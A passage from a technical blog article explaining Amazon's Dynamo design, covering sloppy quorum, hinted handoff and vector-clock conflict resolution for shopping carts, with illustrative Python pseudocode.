            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="nf"&gt;is_healthy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;

    &lt;span class="c1"&gt;# Write to first N healthy nodes
&lt;/span&gt;    &lt;span class="n"&gt;acks&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;healthy_nodes&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;is_hint&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Store with hint metadata
&lt;/span&gt;            &lt;span class="n"&gt;intended_node&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;find_intended_node&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write_hinted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;acks&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;acks&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;SUCCESS&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;FAILURE&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2: Background hint transfer&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Runs periodically on each node (e.g., every 10 seconds)
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;transfer_hints&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;hints_db&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_hinted_replicas&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;hints_db&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;intended_node&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;intended_for&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;is_healthy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;hints_db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;delete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Successfully transferred hint to &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Will retry later for &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;intended_node&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Why This Is Brilliant
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Durability maintained:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Even though B is down:
- We still have N=3 copies: A, C, D
- Data won't be lost even if another node fails
- System maintains durability guarantee
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Availability maximized:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client perspective:
- Write succeeds immediately
- No error message
- No retry needed
- Customer happy

Traditional quorum would have failed:
- Only 2 nodes available (A, C)
- Need 3 for N=3
- Write rejected
- Customer sees error
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Eventual consistency:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Timeline:
T=0:    Write succeeds (A, C, D with hint)
T=0-5min: B is down, but system works fine
T=5min: B recovers
T=5min+10sec: D detects B is back, transfers hint
T=5min+11sec: B has the data, D deletes hint

Result: Eventually, all correct replicas have the data
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Configuration Example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// High availability configuration&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Want 3 replicas&lt;/span&gt;
  &lt;span class="na"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Only need 2 ACKs to succeed&lt;/span&gt;
  &lt;span class="na"&gt;R&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Read from 2 nodes&lt;/span&gt;

  &lt;span class="c1"&gt;// Sloppy quorum allows expanding preference list&lt;/span&gt;
  &lt;span class="na"&gt;sloppy_quorum&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

  &lt;span class="c1"&gt;// How far to expand when looking for healthy nodes&lt;/span&gt;
  &lt;span class="na"&gt;max_extended_preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

  &lt;span class="c1"&gt;// How often to check for hint transfers&lt;/span&gt;
  &lt;span class="na"&gt;hint_transfer_interval&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="nx"&gt;_seconds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

  &lt;span class="c1"&gt;// How long to keep trying to transfer hints&lt;/span&gt;
  &lt;span class="na"&gt;hint_retention&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="nx"&gt;_days&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Real-World Impact
&lt;/h4&gt;

&lt;p&gt;From Amazon's production experience (the specific percentages below are illustrative, not figures from the paper):&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;During normal operation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hinted handoff rarely triggered&lt;/li&gt;
&lt;li&gt;Most writes go to preferred nodes&lt;/li&gt;
&lt;li&gt;Hints database is mostly empty&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;During failures:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: 5% of nodes failing at any time (normal at Amazon's scale)

Without hinted handoff:
- Write success rate: 85%
- Customer impact: 15% of cart additions fail

With hinted handoff:
- Write success rate: 99.9%+
- Customer impact: Nearly zero
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;During datacenter failure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: Entire datacenter unreachable (33% of nodes)

Without hinted handoff:
- Many keys would lose entire preference list
- Massive write failures
- System effectively down

With hinted handoff:
- Writes redirect to other datacenters
- Hints accumulate temporarily
- When datacenter recovers, hints transfer
- Zero customer-visible failures
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The Trade-off
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✓ Maximum write availability&lt;/li&gt;
&lt;li&gt;✓ Durability maintained during failures&lt;/li&gt;
&lt;li&gt;✓ Automatic recovery when nodes come back&lt;/li&gt;
&lt;li&gt;✓ No manual intervention required&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Costs:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✗ Temporary inconsistency (data not on "correct" nodes)&lt;/li&gt;
&lt;li&gt;✗ Extra storage for hints database&lt;/li&gt;
&lt;li&gt;✗ Background bandwidth for hint transfers&lt;/li&gt;
&lt;li&gt;✗ Slightly more complex code&lt;/li&gt;
&lt;li&gt;✗ &lt;strong&gt;Hinted handoff provides temporary durability, not permanent replication.&lt;/strong&gt; If a substitute node (like D) fails before it can transfer its hint back to B, the number of true replicas drops below N until the situation resolves. This is an important edge case to understand in failure planning.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Amazon's verdict:&lt;/strong&gt; The availability benefits far outweigh the costs for e-commerce workloads.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conflict Resolution: The Shopping Cart Problem
&lt;/h2&gt;

&lt;p&gt;Let's talk about the most famous example from the paper: the shopping cart. This is where the rubber meets the road.&lt;/p&gt;

&lt;h3&gt;
  
  
  What Is a Conflict (and Why Does It Happen)?
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;conflict&lt;/strong&gt; occurs when two writes happen to the same key on different nodes, without either write "knowing about" the other. This is only possible because Dynamo accepts writes even when nodes can't communicate—which is the whole point!&lt;/p&gt;

&lt;p&gt;Here's a concrete sequence of events that creates a conflict:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Timeline:
T=0:  Customer logs in. Cart has {shoes} on all 3 nodes.
T=1:  Network partition: Node1 can't talk to Node2.
T=2:  Customer adds {jacket} on their laptop → goes to Node1.
      Cart on Node1: {shoes, jacket}   ← Vector clock: [N1:2]
T=3:  Customer adds {hat} on their phone → goes to Node2.
      Cart on Node2: {shoes, hat}      ← Vector clock: [N2:2]
T=4:  Network heals. Node1 and Node2 compare notes.
      Node1 says: "I have version [N1:2]"
      Node2 says: "I have version [N2:2]"
      Neither clock dominates the other → CONFLICT!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Neither version is "wrong"—both represent real actions the customer took. Dynamo's job is to detect this situation (via vector clocks) and surface &lt;strong&gt;both versions&lt;/strong&gt; to the application so the application can decide what to do.&lt;/p&gt;
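&lt;p&gt;The comparison at T=4 is a simple element-wise check: clock A dominates clock B if A has seen at least as many events from every node. A minimal sketch (illustrative, not Dynamo's actual code):&lt;/p&gt;

```python
def dominates(a: dict[str, int], b: dict[str, int]) -> bool:
    """True if clock `a` has seen everything clock `b` has (per-node >=)."""
    return all(a.get(node, 0) >= count for node, count in b.items())

def compare(a: dict[str, int], b: dict[str, int]) -> str:
    if dominates(a, b) and dominates(b, a):
        return "identical"
    if dominates(a, b):
        return "a supersedes b"
    if dominates(b, a):
        return "b supersedes a"
    return "concurrent"  # neither dominates: a genuine conflict

print(compare({"N1": 2}, {"N2": 2}))           # concurrent
print(compare({"N1": 2, "N2": 2}, {"N1": 2}))  # a supersedes b
```

The last case is exactly the cart scenario above: [N1:2] and [N2:2] each contain an event the other has never seen, so the coordinator must surface both versions.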

&lt;h3&gt;
  
  
  What Does the Application Do With a Conflict?
&lt;/h3&gt;

&lt;p&gt;This is the crucial part that the paper delegates to you: &lt;strong&gt;the application must resolve conflicts using business logic&lt;/strong&gt;. Dynamo gives you all the concurrent versions; your code decides how to merge them.&lt;/p&gt;

&lt;p&gt;For the shopping cart, Amazon chose a &lt;strong&gt;union merge&lt;/strong&gt;: keep all items from all concurrent versions. The rationale is simple—losing an item from a customer's cart (missing a sale) is worse than occasionally showing a stale item they already deleted.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Conflict versions:
  Version A (from Node1): {shoes, jacket}
  Version B (from Node2): {shoes, hat}

Merge strategy: union
  Merged cart: {shoes, jacket, hat}  ← All items preserved
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2t1c9gnz6aklthq3y27.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2t1c9gnz6aklthq3y27.png" alt="image" width="800" height="1306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the actual reconciliation code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;__future__&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;annotations&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;dataclasses&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;dataclass&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;


&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Merged clock = max of each node&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s counter across both versions.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;all_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;merged&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_keys&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;merged&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;


&lt;span class="nd"&gt;@dataclass&lt;/span&gt;
&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;field&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default_factory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;field&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default_factory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nd"&gt;@staticmethod&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ShoppingCart&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ShoppingCart&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;  &lt;span class="c1"&gt;# No conflict, nothing to do
&lt;/span&gt;
        &lt;span class="c1"&gt;# Merge strategy: union of all items (never lose additions).
&lt;/span&gt;        &lt;span class="c1"&gt;# This is Amazon's choice for shopping carts.
&lt;/span&gt;        &lt;span class="c1"&gt;# A different application might choose last-write-wins or something else.
